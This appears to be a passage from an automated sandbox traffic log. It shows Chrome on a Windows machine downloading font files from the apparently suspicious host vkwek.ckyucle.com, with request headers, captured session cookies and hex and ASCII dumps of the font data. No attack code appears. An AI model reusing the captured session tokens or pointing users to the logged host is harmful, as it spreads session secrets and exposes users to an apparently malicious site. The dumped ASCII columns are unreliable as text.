                                                              2024-07-03 07:41:05 UTC1369INData Raw: 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad e7 c6 8f 17 6c
                                                              Data Ascii: Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}l
                                                              2024-07-03 07:41:05 UTC1369INData Raw: c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1 28 c6 66 00 ca
                                                              Data Ascii: (P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA(f
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 03 db c2 c7 5d 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd 7b 87 f8 ac 9c
                                                              Data Ascii: ]p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o{


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.662922188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1390OUTGET /78l8NmRVxJ45fjuJRst60 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC616INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: font/woff2
                                                              Content-Length: 28584
                                                              Connection: close
                                                              Content-Disposition: inline; filename="78l8NmRVxJ45fjuJRst60"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvRZL3gjbSpU8b8pcezXUvoDWXVAddjKKewyLg9Kl2Nlfy1YITXlep8n3%2B%2BNewbMj0Rb59OHid2tOUPeH6Hl%2FOeUpZdwFQ4XKnrzabEwMsISXvQgvaSq4ElDLFTdiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2ce9fd42e8-EWR
                                                              2024-07-03 07:41:05 UTC753INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                              Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                              2024-07-03 07:41:05 UTC1369INData Raw: e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93 7a cd 73 01 6e b9
                                                              Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ Xzsn
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd 24 bd 7e 42 53 3e
                                                              Data Ascii: 0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I$~BS>
                                                              2024-07-03 07:41:05 UTC1369INData Raw: fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01 9d 5a 25 56 9b 9b
                                                              Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFxZ%V
                                                              2024-07-03 07:41:05 UTC1369INData Raw: c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e 8d bc 0a 1b c8 14
                                                              Data Ascii: ,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                                                              2024-07-03 07:41:05 UTC1369INData Raw: c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be ed b1 78 f5 6d 48
                                                              Data Ascii: ^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=xmH
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8 7a d5 90 a4 f5 bb
                                                              Data Ascii: CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oSz
                                                              2024-07-03 07:41:05 UTC1369INData Raw: f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1 64 9a 6e d7 e8 c1
                                                              Data Ascii: Qa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=Wdn
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41 35 e7 6c 42 45 56
                                                              Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A5lBEV
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1 24 df 05 b6 03 ae
                                                              Data Ascii: T;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg$


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.662921188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1399OUTGET /45TplGCNDXCptZb896Wyz84jpQxy69 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC626INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: font/woff
                                                              Content-Length: 36696
                                                              Connection: close
                                                              Content-Disposition: inline; filename="45TplGCNDXCptZb896Wyz84jpQxy69"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbBrWIdQwmhdCdK2xgXLVEc3UAAvAHbLdLlMLzmwxofvX6TH1W5TKnkZPMr1jZdIntSEmTJX6BhvJ8YdvJrWi8%2B1r%2FUfug56K2H5CQEL%2B7gSIcjp1WE4BlQ5L%2FuEXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2cfe724244-EWR
                                                              2024-07-03 07:41:05 UTC743INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                              Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 4c ba 90 ee a5 9f 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7
                                                              Data Ascii: L g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj
